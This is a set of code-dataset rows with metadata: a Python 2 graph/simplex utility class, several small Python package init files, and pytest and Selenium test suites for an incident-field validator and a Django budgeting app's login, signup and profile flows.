2020-04-06T18:07:57.000Z
|
"""this class create for simple process on string"""
from simplex import Simplex
class Operator:
def create_complete_connection(self, edgeText, vertices):
edgeText=self.get_combination(edgeText)
tempList = []
tempListGraph = []
for i in range(len(edgeText)):
if (edgeText[i] <> ',') and (edgeText[i] <> '.'):
tempList.append(edgeText[i])
if (edgeText[i] == ','):
tempList.sort()
for j in range(len(tempList)):
tempGraph = Simplex(tempList[j])
tempGraph.name = tempList[j]
tempListGraph.append(tempGraph)
tempTree = []
for j in range(len(tempListGraph)):
if j <> 0:
tempTree.append(tempListGraph[j])
vertices[int(min(tempList)) - 1].insert_childs(tempTree)
tempList = []
tempListGraph = []
if (edgeText[i] == '.'):
tempList.sort()
for j in range(len(tempList)):
tempGraph = Simplex(tempList[j])
tempGraph.name = tempList[j]
tempListGraph.append(tempGraph)
tempTree = []
for j in range(len(tempListGraph)):
if j <> 0:
tempTree.append(tempListGraph[j])
vertices[int(min(tempList)) - 1].insert_childs(tempTree)
return
def create_simple_connection(self, edgeText, vertices):
tempList = []
tempListGraph = []
for i in range(len(edgeText)):
if (edgeText[i] <> ',') and (edgeText[i] <> '.'):
tempList.append(edgeText[i])
if (edgeText[i] == ','):
tempList.sort()
for j in range(len(tempList)):
tempGraph = Simplex(tempList[j])
tempGraph.name = tempList[j]
tempListGraph.append(tempGraph)
tempTree = []
for j in range(len(tempListGraph)):
if j <> 0:
tempTree.append(tempListGraph[j])
vertices[int(min(tempList)) - 1].insert_childs(tempTree)
tempList = []
tempListGraph = []
if (edgeText[i] == '.'):
tempList.sort()
for j in range(len(tempList)):
tempGraph = Simplex(tempList[j])
tempGraph.name = tempList[j]
tempListGraph.append(tempGraph)
tempTree = []
for j in range(len(tempListGraph)):
if j <> 0:
tempTree.append(tempListGraph[j])
vertices[int(min(tempList)) - 1].insert_childs(tempTree)
return
def delete_connection(self, edgeText, vertices):
tempList = []
tempListGraph = []
for i in range(len(edgeText)):
if (edgeText[i] <> ',') and (edgeText[i] <> '.'):
tempList.append(edgeText[i])
if (edgeText[i] == ','):
tempList.sort()
for j in range(len(tempList)):
tempGraph = Simplex(tempList[j])
tempGraph.name = tempList[j]
tempListGraph.append(tempGraph)
tempTree = []
for j in range(len(tempListGraph)):
if j <> 0:
# first element is node
tempTree.append(tempListGraph[j])
vertices[int(min(tempList)) - 1].delete_childs(tempTree)
for j in range(len(vertices)):
if int(vertices[j].name) < int(vertices[int(min(tempList)) - 1].name):
vertices[j].delete_childs(tempListGraph)
tempList = []
tempListGraph = []
if (edgeText[i] == '.'):
tempList.sort()
for j in range(len(tempList)):
tempGraph = Simplex(tempList[j])
tempGraph.name = tempList[j]
tempListGraph.append(tempGraph)
tempTree = []
for j in range(len(tempListGraph)):
if j <> 0:
# first element is node
tempTree.append(tempListGraph[j])
vertices[int(min(tempList)) - 1].delete_childs(tempTree)
for j in range(len(vertices)):
if int(vertices[j].name) < int(vertices[int(min(tempList)) - 1].name):
vertices[j].delete_childs(tempListGraph)
return
def show_structures(self,vertices):
for i in range(len(vertices)):
print 'vertices are: ', vertices[i].name
for i in range(len(vertices)):
for key1, value1 in vertices[i].childs.items():
print 'edges connection are: ', value1.parents[vertices[i].name].name, '<--->', value1.name
for i in range(len(vertices)):
for key1, value1 in vertices[i].childs.items():
for key2, value2 in vertices[i].childs[key1].childs.items():
print 'triangles connection are: ', value1.parents[
vertices[i].name].name, '<--->', value1.name, '<--->', value2.name
for i in range(len(vertices)):
for key1, value1 in vertices[i].childs.items():
for key2, value2 in vertices[i].childs[key1].childs.items():
for key3, value3 in vertices[i].childs[key1].childs[key2].childs.items():
print 'tetrahedron connection are: ', value1.parents[
vertices[i].name].name, '<--->', value1.name, '<--->', value2.name, '<--->', value3.name
def get_combination(self, edgeText):
A = []
S = ''
for j in range(2, len(edgeText) + 1):
for x in self.get_combination_list(edgeText, j):
A.append(x)
for i in range(len(A)):
for j in range(len(A[i])):
S = S + str(A[i][j])
if i < len(A) - 1:
S = S + ','
if i == len(A) - 1:
S = S + '.'
return S
def get_combination_list(self, items, n):
if n == 0:
yield []
else:
for i in range(len(items)):
for cc in self.get_combination_list(items[i + 1:], n - 1):
yield [items[i]] + cc
| 42.805195
| 116
| 0.476335
| 649
| 6,592
| 4.804314
| 0.109399
| 0.056126
| 0.076972
| 0.056446
| 0.845093
| 0.816228
| 0.800513
| 0.794099
| 0.794099
| 0.794099
| 0
| 0.01161
| 0.398968
| 6,592
| 153
| 117
| 43.084967
| 0.775366
| 0.006523
| 0
| 0.75
| 0
| 0
| 0.020634
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.007143
| null | null | 0.028571
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b305962f04f4a8d8b9e8e6029ec3a23cbdbef1b1
| 4,190
|
py
|
Python
|
Tests/scripts/hook_validations/tests/incident_field_test.py
|
RichieB2B/content
|
4916d6c5f024da79c22bda85272091e41a700bfa
|
[
"MIT"
] | 7
|
2020-09-24T22:38:01.000Z
|
2021-07-14T15:58:35.000Z
|
Tests/scripts/hook_validations/tests/incident_field_test.py
|
RichieB2B/content
|
4916d6c5f024da79c22bda85272091e41a700bfa
|
[
"MIT"
] | 9
|
2021-02-08T20:51:18.000Z
|
2021-09-23T23:27:38.000Z
|
Tests/scripts/hook_validations/tests/incident_field_test.py
|
RichieB2B/content
|
4916d6c5f024da79c22bda85272091e41a700bfa
|
[
"MIT"
] | 2
|
2020-12-08T17:03:33.000Z
|
2021-07-13T18:32:06.000Z
|
from Tests.scripts.hook_validations.incident_field import IncidentFieldValidator
def test_is_valid_name_sanity():
validator = IncidentFieldValidator('temp_file', check_git=False)
validator.current_incident_field = {
'cliName': 'sanity name',
'name': 'sanity name',
'id': 'incident',
'content': True,
}
assert validator.is_valid_name()
assert validator.is_valid()
def test_is_valid_name_bad_cli_name():
validator = IncidentFieldValidator('temp_file', check_git=False)
validator.current_incident_field = {
'cliName': 'Incident',
'name': 'sanity name',
'content': True,
}
assert not validator.is_valid_name()
assert not validator.is_valid()
validator.current_incident_field = {
'cliName': 'case',
'name': 'sanity name',
'content': True,
}
assert not validator.is_valid_name()
assert not validator.is_valid()
validator.current_incident_field = {
'cliName': 'Playbook',
'name': 'sanity name',
'content': True,
}
assert not validator.is_valid_name()
assert not validator.is_valid()
validator.current_incident_field = {
'cliName': 'Alerting feature',
'name': 'sanity name',
'content': True,
}
assert not validator.is_valid_name()
assert not validator.is_valid()
validator.current_incident_field = {
'cliName': 'INciDeNts',
'name': 'sanity name',
'content': True,
}
assert not validator.is_valid_name()
assert not validator.is_valid()
def test_is_valid_name_bad_name():
validator = IncidentFieldValidator('temp_file', check_git=False)
validator.current_incident_field = {
'cliName': 'sanity name',
'name': 'Incident',
'content': True,
}
assert not validator.is_valid_name()
assert not validator.is_valid()
validator.current_incident_field = {
'cliName': 'sanity name',
'name': 'case',
'content': True,
}
assert not validator.is_valid_name()
assert not validator.is_valid()
validator.current_incident_field = {
'cliName': 'sanity name',
'name': 'Playbook',
'content': True,
}
assert not validator.is_valid_name()
assert not validator.is_valid()
validator.current_incident_field = {
'cliName': 'sanity name',
'name': 'Alerting feature',
'content': True,
}
assert not validator.is_valid_name()
assert not validator.is_valid()
validator.current_incident_field = {
'cliName': 'sanity name',
'name': 'INciDeNts',
'content': True,
}
assert not validator.is_valid_name()
assert not validator.is_valid()
def test_is_valid_content_flag_sanity():
validator = IncidentFieldValidator('temp_file', check_git=False)
validator.current_incident_field = {
'content': True
}
assert validator.is_valid_content_flag()
assert validator.is_valid()
def test_is_valid_content_flag_invalid_values():
validator = IncidentFieldValidator('temp_file', check_git=False)
validator.current_incident_field = {
'content': False
}
assert not validator.is_valid_content_flag()
assert not validator.is_valid()
validator.current_incident_field = {
'something': True
}
assert not validator.is_valid_content_flag()
assert not validator.is_valid()
def test_is_valid_system_flag_sanity():
validator = IncidentFieldValidator('temp_file', check_git=False)
validator.current_incident_field = {
'system': False,
'content': True,
}
assert validator.is_valid_system_flag()
assert validator.is_valid()
validator.current_incident_field = {
'content': True,
}
assert validator.is_valid_system_flag()
assert validator.is_valid()
def test_is_valid_system_flag_invalid():
validator = IncidentFieldValidator('temp_file', check_git=False)
validator.current_incident_field = {
'system': True,
'content': True,
}
assert not validator.is_valid_system_flag()
assert not validator.is_valid()
| 26.518987
| 80
| 0.659189
| 459
| 4,190
| 5.705882
| 0.087146
| 0.109584
| 0.207713
| 0.198549
| 0.913708
| 0.905307
| 0.875143
| 0.861397
| 0.859107
| 0.792287
| 0
| 0
| 0.232458
| 4,190
| 157
| 81
| 26.687898
| 0.814366
| 0
| 0
| 0.648
| 0
| 0
| 0.131026
| 0
| 0
| 0
| 0
| 0
| 0.272
| 1
| 0.056
| false
| 0
| 0.008
| 0
| 0.064
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
64096dc8757d1167f4b5cd6be8438ef82939bf15
| 284
|
py
|
Python
|
feature_encoders/validate/__init__.py
|
hebes-io/feature-encoding
|
741b486a82b346c0354403b6707e105f74012d68
|
[
"Apache-2.0"
] | null | null | null |
feature_encoders/validate/__init__.py
|
hebes-io/feature-encoding
|
741b486a82b346c0354403b6707e105f74012d68
|
[
"Apache-2.0"
] | null | null | null |
feature_encoders/validate/__init__.py
|
hebes-io/feature-encoding
|
741b486a82b346c0354403b6707e105f74012d68
|
[
"Apache-2.0"
] | null | null | null |
from .schemas import (
CategoricalSchema,
CyclicalSchema,
DatetimeSchema,
LinearSchema,
SplineSchema,
TrendSchema,
)
__all__ = [
"CategoricalSchema",
"CyclicalSchema",
"DatetimeSchema",
"LinearSchema",
"SplineSchema",
"TrendSchema",
]
| 15.777778
| 24
| 0.647887
| 16
| 284
| 11.25
| 0.625
| 0.344444
| 0.5
| 0.633333
| 0.888889
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0.246479
| 284
| 17
| 25
| 16.705882
| 0.841122
| 0
| 0
| 0
| 0
| 0
| 0.28169
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.0625
| 0
| 0.0625
| 0
| 1
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
641ea04e45cab2797d3513cfb29855a914fc70c3
| 144
|
py
|
Python
|
syslinkats/framework/aws/__init__.py
|
stick152/SystemLink-Python-ATS
|
82b0fac9bae22b808ba519fa4425a931ff3c77aa
|
[
"MIT"
] | null | null | null |
syslinkats/framework/aws/__init__.py
|
stick152/SystemLink-Python-ATS
|
82b0fac9bae22b808ba519fa4425a931ff3c77aa
|
[
"MIT"
] | null | null | null |
syslinkats/framework/aws/__init__.py
|
stick152/SystemLink-Python-ATS
|
82b0fac9bae22b808ba519fa4425a931ff3c77aa
|
[
"MIT"
] | null | null | null |
from syslinkats.framework.aws.aws_base import AWSBase
from syslinkats.framework.aws.aws_base import AWSHTTPStatusError
__author__ = 'sedwards'
| 28.8
| 64
| 0.854167
| 18
| 144
| 6.5
| 0.555556
| 0.239316
| 0.393162
| 0.444444
| 0.666667
| 0.666667
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 144
| 4
| 65
| 36
| 0.886364
| 0
| 0
| 0
| 0
| 0
| 0.055556
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
642809bdea4994bef038000c5dedc4f5c054a9c4
| 224
|
py
|
Python
|
src/plugins/leetcode/test_data_source.py
|
umimori13/mai-bot
|
90e10f6488942809d4ca5ef342f403b683dbc904
|
[
"MIT"
] | null | null | null |
src/plugins/leetcode/test_data_source.py
|
umimori13/mai-bot
|
90e10f6488942809d4ca5ef342f403b683dbc904
|
[
"MIT"
] | null | null | null |
src/plugins/leetcode/test_data_source.py
|
umimori13/mai-bot
|
90e10f6488942809d4ca5ef342f403b683dbc904
|
[
"MIT"
] | null | null | null |
from unittest import TestCase
from data_source import get_leetcode_question_everyday
class Test(TestCase):
def test_get_leetcode_question_every_day(self):
get_leetcode_question_everyday()
#self.fail()
| 22.4
| 54
| 0.78125
| 29
| 224
| 5.62069
| 0.586207
| 0.202454
| 0.349693
| 0.331288
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.165179
| 224
| 9
| 55
| 24.888889
| 0.871658
| 0.049107
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0
| 0.4
| 0
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
643755f38a7706eab7dcb793080d3b47e2567821
| 27,585
|
py
|
Python
|
budgetsupervisor/users/tests/test_live_server.py
|
ltowarek/budget-supervisor
|
862a2d720aecd4ad2fded9c63bc839190ebbc77e
|
[
"MIT"
] | 1
|
2022-03-01T10:28:31.000Z
|
2022-03-01T10:28:31.000Z
|
budgetsupervisor/users/tests/test_live_server.py
|
ltowarek/budget-supervisor
|
862a2d720aecd4ad2fded9c63bc839190ebbc77e
|
[
"MIT"
] | 75
|
2020-11-07T20:14:55.000Z
|
2021-10-05T15:08:22.000Z
|
budgetsupervisor/users/tests/test_live_server.py
|
ltowarek/budget-supervisor
|
862a2d720aecd4ad2fded9c63bc839190ebbc77e
|
[
"MIT"
] | null | null | null |
from typing import Callable, Iterable
import pytest
from budget.models import Account, Connection, Transaction
from django.core import mail
from django.shortcuts import reverse
from django.utils.encoding import force_bytes
from django.utils.http import urlsafe_base64_encode
from saltedge_wrapper.factory import customers_api
from selenium.webdriver.firefox.webdriver import WebDriver
from swagger_client.rest import ApiException
from users.models import Profile, User
from users.services import create_customer_in_saltedge
from users.tokens import user_tokenizer
pytestmark = pytest.mark.selenium
class TestLogin:
def test_valid_credentials_redirect_to_budget_index(
self,
selenium: WebDriver,
live_server_path: Callable[[str], str],
user_foo: User,
) -> None:
url = live_server_path(reverse("login"))
selenium.get(url)
self.login_user(selenium, "foo", "password")
assert selenium.current_url == live_server_path(reverse("budget_index"))
def test_password_reset_link_is_available(
self, selenium: WebDriver, live_server_path: Callable[[str], str],
) -> None:
url = live_server_path(reverse("login"))
selenium.get(url)
element = selenium.find_element_by_link_text("Forgot password?")
assert element.get_attribute("href") == live_server_path(
reverse("password_reset")
)
def test_invalid_credentials_prints_error_message(
self, selenium: WebDriver, live_server_path: Callable[[str], str]
) -> None:
url = live_server_path(reverse("login"))
selenium.get(url)
self.login_user(selenium, "bar", "xyz")
messages = [
m.text
for m in selenium.find_elements_by_xpath('//div[contains(@class, "alert")]')
]
assert any(
"Please enter a correct username and password." in message
for message in messages
)
def test_inactive_user_cant_log_in(
self,
selenium: WebDriver,
live_server_path: Callable[[str], str],
user_foo: User,
) -> None:
user_foo.is_active = False
user_foo.save()
url = live_server_path(reverse("login"))
selenium.get(url)
self.login_user(selenium, "foo", "password")
assert selenium.find_elements_by_xpath('//div[contains(@class, "alert")]')
# Can't check if user is inactive or credentials are wrong - https://code.djangoproject.com/ticket/28645
def test_next_redirects_to_requested_url(
self,
selenium: WebDriver,
live_server_path: Callable[[str], str],
user_foo: User,
) -> None:
url = live_server_path(reverse("login") + "?next=" + reverse("profile"))
selenium.get(url)
self.login_user(selenium, "foo", "password")
assert selenium.current_url == live_server_path(reverse("profile"))
def test_redirect_if_already_logged_in(
self,
selenium: WebDriver,
live_server_path: Callable[[str], str],
user_foo: User,
authenticate_selenium: Callable[..., WebDriver],
) -> None:
selenium = authenticate_selenium(user=user_foo)
url = live_server_path(reverse("login"))
selenium.get(url)
assert selenium.current_url == live_server_path(reverse("budget_index"))
def test_not_authenticated_user_accessing_page_is_redirected_to_login_page(
self, selenium: WebDriver, live_server_path: Callable[[str], str]
) -> None:
url = live_server_path(reverse("profile"))
selenium.get(url)
assert selenium.current_url == live_server_path(
reverse("login") + "?next=" + reverse("profile")
)
assert (
selenium.find_element_by_id("login_required").text
== "Please login to see this page."
)
def login_user(self, selenium: WebDriver, username: str, password: str) -> None:
username_input = selenium.find_element_by_name("username")
username_input.send_keys(username)
password_input = selenium.find_element_by_name("password")
password_input.send_keys(password)
selenium.find_element_by_xpath('//button[@type="submit"]').click()
class TestSignUp:
def test_sign_up_redirects_to_login_page(
self, selenium: WebDriver, live_server_path: Callable[[str], str]
) -> None:
url = live_server_path(reverse("signup"))
selenium.get(url)
self.sign_up_user(selenium, "foo", "Foo Password", "foo@example.com")
assert selenium.current_url == live_server_path(reverse("login"))
def test_message(
self, selenium: WebDriver, live_server_path: Callable[[str], str]
) -> None:
url = live_server_path(reverse("signup"))
selenium.get(url)
self.sign_up_user(selenium, "foo", "Foo Password", "foo@example.com")
messages = [
m.text
for m in selenium.find_elements_by_xpath('//div[contains(@class, "alert")]')
]
assert any(
"Please check your inbox for activation link." in message
for message in messages
)
def test_user_with_existing_username_cant_sign_up(
self,
selenium: WebDriver,
live_server_path: Callable[[str], str],
user_foo: User,
) -> None:
url = live_server_path(reverse("signup"))
selenium.get(url)
self.sign_up_user(selenium, "foo", "password", "foo@example.com")
assert (
selenium.find_element_by_class_name("invalid-feedback").text
== "A user with that username already exists."
)
def test_sign_up_sends_activation_email(
self, selenium: WebDriver, live_server_path: Callable[[str], str]
) -> None:
url = live_server_path(reverse("signup"))
selenium.get(url)
self.sign_up_user(selenium, "foo", "Foo Password", "foo@example.com")
assert mail.outbox
activation_email = mail.outbox[0]
assert "foo@example.com" in activation_email.to
assert activation_email.subject == "Budget Supervisor Email Confirmation"
assert (
"Please click the following link to complete your registration."
in activation_email.body
)
def test_sign_up_creates_inactive_user(
self, selenium: WebDriver, live_server_path: Callable[[str], str]
) -> None:
url = live_server_path(reverse("signup"))
selenium.get(url)
self.sign_up_user(selenium, "foo", "Foo Password", "foo@example.com")
user = User.objects.get(username="foo")
assert user.is_active is False
def sign_up_user(
self, selenium: WebDriver, username: str, password: str, email: str
) -> None:
username_input = selenium.find_element_by_name("username")
username_input.send_keys(username)
email_input = selenium.find_element_by_name("email")
email_input.send_keys(email)
password1_input = selenium.find_element_by_name("password1")
password1_input.send_keys(password)
password2_input = selenium.find_element_by_name("password2")
password2_input.send_keys(password)
selenium.find_element_by_xpath('//button[@type="submit"]').click()
class TestUserActivateView:
def test_user_is_activated(
self,
selenium: WebDriver,
live_server_path: Callable[[str], str],
user_foo_inactive: User,
) -> None:
self.activate_user(selenium, live_server_path, user_foo_inactive)
assert user_foo_inactive.is_active is True
def test_redirect(
self,
selenium: WebDriver,
live_server_path: Callable[[str], str],
user_foo_inactive: User,
) -> None:
self.activate_user(selenium, live_server_path, user_foo_inactive)
assert selenium.current_url == live_server_path(reverse("login"))
def test_message(
self,
selenium: WebDriver,
live_server_path: Callable[[str], str],
user_foo_inactive: User,
) -> None:
self.activate_user(selenium, live_server_path, user_foo_inactive)
messages = [
m.text
for m in selenium.find_elements_by_xpath('//div[contains(@class, "alert")]')
]
assert any(
"Registration complete. Please login." in message for message in messages
)
def test_invalid_user_id(
self,
selenium: WebDriver,
live_server_path: Callable[[str], str],
user_foo_inactive: User,
) -> None:
user_id = urlsafe_base64_encode(force_bytes(123))
token = user_tokenizer.make_token(user_foo_inactive)
url = live_server_path(
reverse("activate", kwargs={"user_id": user_id, "token": token})
)
selenium.get(url)
messages = [
m.text
for m in selenium.find_elements_by_xpath('//div[contains(@class, "alert")]')
]
assert any(
"Registration confirmation error. Please click the reset password to generate a new confirmation email."
in message
for message in messages
)
def test_invalid_token(
self,
selenium: WebDriver,
live_server_path: Callable[[str], str],
user_foo_inactive: User,
) -> None:
user_id = urlsafe_base64_encode(force_bytes(user_foo_inactive.id))
token = "123"
url = live_server_path(
reverse("activate", kwargs={"user_id": user_id, "token": token})
)
selenium.get(url)
messages = [
m.text
for m in selenium.find_elements_by_xpath('//div[contains(@class, "alert")]')
]
assert any(
"Registration confirmation error. Please click the reset password to generate a new confirmation email."
in message
for message in messages
)
def activate_user(
self, selenium: WebDriver, live_server_path: Callable[[str], str], user: User
) -> None:
user_id = urlsafe_base64_encode(force_bytes(user.id))
token = user_tokenizer.make_token(user)
url = live_server_path(
reverse("activate", kwargs={"user_id": user_id, "token": token})
)
selenium.get(url)
user.refresh_from_db()
class TestPasswordResetView:
def test_email(
self,
selenium: WebDriver,
live_server_path: Callable[[str], str],
user_foo: User,
) -> None:
self.reset_password(selenium, live_server_path, user_foo.email)
assert mail.outbox
password_reset_email = mail.outbox[0]
assert user_foo.email in password_reset_email.to
assert password_reset_email.subject == "Budget Supervisor Password Reset"
assert (
"Please click the following link to reset your password."
in password_reset_email.body
)
def test_redirect(
self,
selenium: WebDriver,
live_server_path: Callable[[str], str],
user_foo: User,
) -> None:
self.reset_password(selenium, live_server_path, user_foo.email)
assert selenium.current_url == live_server_path(reverse("login"))
def reset_password(
self, selenium: WebDriver, live_server_path: Callable[[str], str], email: str
) -> None:
url = live_server_path(reverse("password_reset"))
selenium.get(url)
email_input = selenium.find_element_by_name("email")
email_input.send_keys(email)
selenium.find_element_by_xpath('//button[@type="submit"]').click()
class TestPasswordResetConfirmationView:
def test_password_is_changed(
self,
selenium: WebDriver,
live_server_path: Callable[[str], str],
user_foo: User,
) -> None:
old_password = user_foo.password
self.reset_password(selenium, live_server_path, user_foo, "New Password")
user_foo.refresh_from_db()
assert user_foo.password != old_password
def test_redirect(
self,
selenium: WebDriver,
live_server_path: Callable[[str], str],
user_foo: User,
) -> None:
self.reset_password(selenium, live_server_path, user_foo, "New Password")
assert selenium.current_url == live_server_path(reverse("budget_index"))
def reset_password(
self,
selenium: WebDriver,
live_server_path: Callable[[str], str],
user: User,
password: str,
) -> None:
user_id = urlsafe_base64_encode(force_bytes(user.id))
token = user_tokenizer.make_token(user)
url = live_server_path(
reverse(
"password_reset_confirm", kwargs={"uidb64": user_id, "token": token}
)
)
selenium.get(url)
new_password1_input = selenium.find_element_by_name("new_password1")
new_password1_input.send_keys(password)
new_password2_input = selenium.find_element_by_name("new_password2")
new_password2_input.send_keys(password)
selenium.find_element_by_xpath('//button[@type="submit"]').click()
print(selenium.page_source)
class TestProfileUpdate:
def test_redirect(
self,
authenticate_selenium: Callable[..., WebDriver],
live_server_path: Callable[[str], str],
profile_foo: Profile,
) -> None:
selenium = authenticate_selenium(user=profile_foo.user)
self.update_profile(selenium, live_server_path, profile_foo)
assert selenium.current_url == live_server_path(reverse("profile"))
def test_message(
self,
authenticate_selenium: Callable[..., WebDriver],
live_server_path: Callable[[str], str],
profile_foo: Profile,
) -> None:
selenium = authenticate_selenium(user=profile_foo.user)
self.update_profile(selenium, live_server_path, profile_foo)
messages = [
m.text
for m in selenium.find_elements_by_xpath('//div[contains(@class, "alert")]')
]
assert any(
"Profile was updated successfully" in message for message in messages
)
def update_profile(
self,
selenium: WebDriver,
live_server_path: Callable[[str], str],
profile: Profile,
) -> None:
url = live_server_path(reverse("profile"))
selenium.get(url)
element = selenium.find_element_by_xpath('//button[@type="submit"]')
element.click()
profile.refresh_from_db()
def test_profile_can_be_deleted(
self,
authenticate_selenium: Callable[..., WebDriver],
live_server_path: Callable[[str], str],
profile_foo: Profile,
) -> None:
selenium = authenticate_selenium(user=profile_foo.user)
url = live_server_path(reverse("profile"))
selenium.get(url)
element = selenium.find_element_by_link_text("Delete account")
assert element
assert element.get_attribute("href") == live_server_path(reverse("user_delete"))
def test_synchronization_can_be_enabled_if_not_already_enabled(
self,
authenticate_selenium: Callable[..., WebDriver],
live_server_path: Callable[[str], str],
profile_foo: Profile,
) -> None:
selenium = authenticate_selenium(user=profile_foo.user)
url = live_server_path(reverse("profile"))
selenium.get(url)
element = selenium.find_element_by_id("synchronization")
assert element.text == "Enable external synchronization"
assert element.get_attribute("href") == live_server_path(
reverse("profile_connect")
)
def test_synchronization_can_be_disabled_if_already_enabled(
self,
authenticate_selenium: Callable[..., WebDriver],
live_server_path: Callable[[str], str],
profile_foo_external: Profile,
) -> None:
selenium = authenticate_selenium(user=profile_foo_external.user)
url = live_server_path(reverse("profile"))
selenium.get(url)
element = selenium.find_element_by_id("synchronization")
assert element.text == "Disable external synchronization"
assert element.get_attribute("href") == live_server_path(
reverse("profile_disconnect")
)
@pytest.fixture
def remove_temporary_customers() -> Iterable[None]:
api = customers_api()
customers_before = api.customers_get().data
yield
customers_after = api.customers_get().data
new_customers = [c for c in customers_after if c not in customers_before]
for customer in new_customers:
api.customers_customer_id_delete(customer.id)
class TestProfileConnect:
def test_profile_is_updated(
self,
authenticate_selenium: Callable[..., WebDriver],
live_server_path: Callable[[str], str],
profile_foo: Profile,
remove_temporary_customers: Callable[[], Iterable[None]],
) -> None:
selenium = authenticate_selenium(user=profile_foo.user)
self.enable_external_synchronization(selenium, live_server_path, profile_foo)
assert profile_foo.external_id is not None
assert selenium.current_url == live_server_path(reverse("profile"))
def test_redirect(
self,
authenticate_selenium: Callable[..., WebDriver],
live_server_path: Callable[[str], str],
profile_foo: Profile,
remove_temporary_customers: Callable[[], Iterable[None]],
) -> None:
selenium = authenticate_selenium(user=profile_foo.user)
self.enable_external_synchronization(selenium, live_server_path, profile_foo)
assert selenium.current_url == live_server_path(reverse("profile"))
def test_message(
self,
authenticate_selenium: Callable[..., WebDriver],
live_server_path: Callable[[str], str],
profile_foo: Profile,
remove_temporary_customers: Callable[[], Iterable[None]],
) -> None:
selenium = authenticate_selenium(user=profile_foo.user)
self.enable_external_synchronization(selenium, live_server_path, profile_foo)
messages = [
m.text
for m in selenium.find_elements_by_xpath('//div[contains(@class, "alert")]')
]
assert any(
"Profile was connected successfully" in message for message in messages
)
def enable_external_synchronization(
self,
selenium: WebDriver,
live_server_path: Callable[[str], str],
profile: Profile,
) -> None:
url = live_server_path(reverse("profile_connect"))
selenium.get(url)
selenium.find_element_by_xpath('//button[@type="submit"]').click()
profile.refresh_from_db()
class TestProfileDisconnect:
def test_profile_is_updated(
self,
authenticate_selenium: Callable[..., WebDriver],
live_server_path: Callable[[str], str],
profile_foo: Profile,
remove_temporary_customers: Callable[[], Iterable[None]],
) -> None:
selenium = authenticate_selenium(user=profile_foo.user)
create_customer_in_saltedge(profile_foo, customers_api())
self.disable_external_synchronization(selenium, live_server_path, profile_foo)
assert profile_foo.external_id is None
def test_customer_is_deleted(
self,
authenticate_selenium: Callable[..., WebDriver],
live_server_path: Callable[[str], str],
profile_foo: Profile,
remove_temporary_customers: Callable[[], Iterable[None]],
) -> None:
api = customers_api()
create_customer_in_saltedge(profile_foo, api)
external_id = profile_foo.external_id
selenium = authenticate_selenium(user=profile_foo.user)
assert api.customers_customer_id_get(external_id)
self.disable_external_synchronization(selenium, live_server_path, profile_foo)
with pytest.raises(ApiException) as e:
api.customers_customer_id_get(external_id)
assert "CustomerNotFound" in str(e.value)
def test_redirect(
self,
authenticate_selenium: Callable[..., WebDriver],
live_server_path: Callable[[str], str],
profile_foo: Profile,
remove_temporary_customers: Callable[[], Iterable[None]],
) -> None:
selenium = authenticate_selenium(user=profile_foo.user)
create_customer_in_saltedge(profile_foo, customers_api())
self.disable_external_synchronization(selenium, live_server_path, profile_foo)
assert selenium.current_url == live_server_path(reverse("profile"))
def test_message(
self,
authenticate_selenium: Callable[..., WebDriver],
live_server_path: Callable[[str], str],
profile_foo: Profile,
remove_temporary_customers: Callable[[], Iterable[None]],
) -> None:
selenium = authenticate_selenium(user=profile_foo.user)
create_customer_in_saltedge(profile_foo, customers_api())
self.disable_external_synchronization(selenium, live_server_path, profile_foo)
messages = [
m.text
for m in selenium.find_elements_by_xpath('//div[contains(@class, "alert")]')
]
assert any(
"Profile was disconnected successfully" in message for message in messages
)
def test_connections_deleted(
self,
authenticate_selenium: Callable[..., WebDriver],
live_server_path: Callable[[str], str],
profile_foo: Profile,
connection_foo: Connection,
remove_temporary_customers: Callable[[], Iterable[None]],
) -> None:
selenium = authenticate_selenium(user=profile_foo.user)
create_customer_in_saltedge(profile_foo, customers_api())
self.disable_external_synchronization(selenium, live_server_path, profile_foo)
assert not Connection.objects.filter(pk=connection_foo.pk).exists()
def test_accounts_disconnected(
self,
authenticate_selenium: Callable[..., WebDriver],
live_server_path: Callable[[str], str],
profile_foo: Profile,
account_foo_external: Account,
remove_temporary_customers: Callable[[], Iterable[None]],
) -> None:
selenium = authenticate_selenium(user=profile_foo.user)
create_customer_in_saltedge(profile_foo, customers_api())
self.disable_external_synchronization(selenium, live_server_path, profile_foo)
account_foo_external.refresh_from_db()
